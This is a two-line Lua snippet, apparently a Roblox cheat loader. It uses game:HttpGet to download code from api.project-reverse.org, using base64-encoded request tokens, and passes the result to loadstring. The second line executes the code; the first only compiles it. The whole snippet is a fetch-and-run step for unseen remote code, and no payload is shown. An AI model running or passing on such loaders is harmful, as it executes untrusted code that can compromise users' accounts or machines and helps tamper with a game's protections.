loadstring(game:HttpGet("https://api.project-reverse.org/run/eyJpZCI6ImMwOGUzZDliLTgxZjMtNGVjYi05NTBlLTZjZmIyNTk3ZDllYiIsImtpbmQiOiJsb2FkZXIiLCJ2aXN1YWwiOnsiaWQiOiJnYWcyX21haW5fdmlzdWFsIn19")) 
loadstring(game:HttpGet("https://api.project-reverse.org/run/eyJpZCI6ImMwOGUzZDliLTgxZjMtNGVjYi05NTBlLTZjZmIyNTk3ZDllYiIsImtpbmQiOiJtZWRpYSIsInZpc3VhbCI6eyJpZCI6ImdhZzJfbWFpbl92aXN1YWwifX0"))()
